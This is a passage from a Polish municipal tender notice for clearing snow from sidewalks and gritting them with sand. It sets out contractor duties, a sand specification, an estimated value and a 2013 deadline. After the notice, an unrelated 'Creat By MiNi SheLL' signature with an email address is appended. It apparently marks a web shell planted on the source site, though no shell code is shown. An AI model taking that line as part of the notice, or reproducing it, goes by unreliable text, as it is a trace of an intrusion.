<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Do obowiązków Wykonawcy należeć będzie:
1)	mechaniczne lub ręczne odśnieżanie chodników, ścieżek pieszo-rowerowych i dojść do przejść dla pieszych, na całej szerokości w taki sposób aby warstwa pozostawionego śniegu nie przekraczała 2-3 centymetrów;
2)	równomierne posypywanie piaskiem odśnieżonych powierzchni. 
      Niedopuszczalne jest rozsypywanie piasku zbrylonego, mieszanek z solą lub innymi
      środkami chemicznymi oraz występowanie nieciągłości w posypywaniu;
3)	wykonanie czynności opisanych w ppkt. 1 i 2, w ciągu 3 godzin od momentu przystąpienia do wykonywania usługi. 
4)	niezwłoczne przystępowanie po otrzymaniu wezwania, (maksymalnie w ciągu 1 godz.)
     do wykonywania powierzonej czynności wchodzącej w zakres zamówienia;
5)	zabezpieczenie i utrzymanie w gotowości sprzętu i maszyn przewidzianych do realizacji zamówienia, wraz z obsługą;
6)	zapewnienie we własnym zakresie paliwa i obsługi naprawczo - remontowej sprzętu przewidzianego do świadczenia usług;
7)	zabezpieczenie we własnym zakresie materiałów (piasku) do zwalczania śliskości zimowej;
      Piasek użyty do zwalczania śliskości zimowej chodników musi spełniać
      następujące  wymagania:
      - uziarnienie do 2,00 mm, nadziarna nie więcej niż 15% (nie dopuszcza się w
        nadziarnie ziaren pow. 4,00 mm,
      - nie może zawierać zanieczyszczeń organicznych jak trawa, korzenie itp.
      - barwa żółta,
      - nie może zawierać żadnych składników spoistych w tym choćby śladowych
        zanieczyszczeń gliniastych lub ilastych,
      Pozostałe wymagania powinny odpowiadać normie: PN-EN-13043;2004   
8)	załadunek piasku własnym sprzętem i na swój koszt;
9)	niezwłoczne przekazywanie upoważnionym pracownikom Zamawiającego, za pośrednictwem osób obsługujących pojazdy i sprzęt informacji o aktualnym stanie chodników, czasie rozpoczęcia i zakończenia wykonywania usług na poszczególnych odcinkach oraz zagrożeniach spowodowanych warunkami atmosferycznymi, 
6.  Zgodnie z art. 30 ust. 4 ustawy, Zamawiający  dopuszcza rozwiązania równoważne
     opisywanym. Wykonawca, który powołuje się na rozwiązania równoważne 
     opisywanym przez Zamawiającego jest obowiązany wykazać, że oferowane usługi
     spełniają wymagania określone przez Zamawiającego (art. 30 ust. 5 ustawy 
     Prawo zamówień publicznych).Za rozwiązania równoważne uznana będzie oferta na
     wykonanie usług z wykorzystaniem sprzętu innego niż określony przez Zamawiającego,
     pod warunkiem, że jego parametry nie będą gorsze. 
Szacunkowa wartość zadania netto: 171940,00 PLN.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.62.00.00-9, 90.63.00.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.04.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com